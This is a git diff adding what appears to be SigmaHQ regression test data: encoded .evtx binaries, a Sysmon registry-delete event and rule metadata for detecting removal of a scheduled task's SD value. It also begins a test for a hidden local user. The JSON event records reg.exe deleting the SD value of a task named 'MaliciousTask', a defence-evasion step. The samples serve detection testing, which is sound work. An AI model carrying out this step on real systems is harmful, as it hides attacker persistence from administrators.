z5I_I{1Q0*~0R#{@r@+wc^uVF|5zGE}f41XsZ%Ka?IM`-3_u=RZ=WO^K0p3sR#y>x} zGVGF~+0`Yp{}#+X&#$~=HmdR)^k;})y1jpnIxneD-!4&~zI~I%zn7MK*)uAeUNxSZ zbp37mN0L9R>SHc#%j>?9p6^!du-ZJesvVD6xkY-;-+H?;`(w^eG`wk(=CsvL&;Qle zefHEXL;s38qR85#AMUAlXSMzOrsfCxpWin8{eNCP@A;E@5|8TdwC8l{59r&e_JR%B zeO9x&HFW)`_Tu66<{KRayWi$)RyP-QqY!PeLkeryQR}nK`dPF|mDCh7q4ORcXH>Fa z^SYY1X+`$vdS2z5?QgnQ*YR5G)z9@h>$PqAT|3?V;u%+Q)NFpGxyt5keynJJu?N(0 zBlM^Q?{7BuX6D=#SZnHt%yGnb}Q_h>&_-WbhR1*^-o6+OXgdsRx zHE+eZnzLd)YO~8#kY)M>tu6M~G;Bsvb=`}rZI;jLox4;QS&C1+U$7Ac`drP1AoHNu zF4o1xX`T)p%iCC(iz6W<_6{TK(uKbQzMZ_ZXm@A=eOjEzyNkS~g8fk!*_(6tgOcsi z?FTe(^KzV$yN4ERU0&>?x_B~eamV9r>U1WU4k)yy0r(V6DJJmvTjV+Qr(@+aW-zNH zo}zW;qO!7Oc`X^vRaR*4QG-5YA4wt~SIbuRu{@$m*@E!gS8X;B!h9UFVI&#rxZ;L~ z(>J{QW!d`GVnYM>Y-#98lXj~u)=~6D!KZ!8+nwfJCoTCiouyL6)1}#*QyH+Q#178XqCDXgp$D!FYA4~b;)--1)6}YIMbQC2k6@6*-seNR7Ny3Lx+YF%EYNcGX zCZv-u#=bqQ6dh3Hgc7M9#_f}~#-e=GZ0=WpuWCMVJL;tXHK$bY!6olXT!=1G-39AT zU)OFu@ua53XSAW;lXgURz4d!lrAIFFD)W5znYcwAWJ~mko{}cpCv8bJ5@55-6j97p z>*Ub1qCQ}s~Z ztE)BEVLNraH@87C?fOZ#u(NkrBk?dlC$obEbUv5KNe*l8$W;i zrM06Q-sx+s|Nr1euW8gCr5S!vr~Xa$ZSWyazieqA49!lc+*i%*I{G)-v+%L`yjC*r z)bC!Xz38iDLEY`q+|6owvK2F~Xi9vdH>UM3T8>`X*_d9YqpBBIG%An3B8@+PIle_x z-;i*&2*i~*iS15fL#iYrXtmS3wWjYrAi@f*@UJX_MIEhq*3 zGv;|6R|?5kHm7kOpT@O^1$H6CH8f}U*kRT1g(R*NlUhD<*YzAtYvoTTdR%EylqapG zLg~3)drz9KUb#opp!vE}ix2v)rq) zKHa-st!`6m*Vtg+v-=m;et+l%|D4#(@j=bnfMUj1<@305dinEuomw4NHrDi{J^JnI z*iL;CM)YQkEA#KLVM*-OdbmevHvSXu%j)*Klt*KV90)6dx9tDsIP>G@Ehqn^m`ZbR zJa{i^-5JpHC-=O}>(@fR$=7x=yfaIBhU^3AZ4HJ#yEMwXRK8QA-lKUQvwh(i_9;3rc z$&qmU+3MUx009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~0R#|0009IL zKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~ z0R#|0009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~0R#|0009ILKmY** z5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0*~0R#|0 r009ILKmY**5I_I{1Q0*~0R#|0009ILKmY**5I_I{1Q0;rcM|v!_2iTU literal 0 HcmV?d00001 diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json new file mode 100644 index 000000000..e0ee86d51 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T00:01:54.872810Z" + } + }, + "EventRecordID": 155709, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteValue", + "UtcTime": "2025-10-25 00:01:54.861", + "ProcessGuid": "5AA13A44-1372-68FC-A51E-000000004002", + "ProcessId": 7008, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\SD", + "User": "NT AUTHORITY\\SYSTEM" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml new file mode 100644 index 000000000..797434d31 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml @@ -0,0 +1,13 @@ +id: b796fd1e-a03a-4db8-a072-c597b6e0da1b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: acd74772-5f88-45c7-956b-6a7b36c294d2 + title: Removal Of SD Value to Hide Schedule Task - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d2da07e5eab71f1f47985e1159eb772522c5f535 GIT binary patch literal 69632 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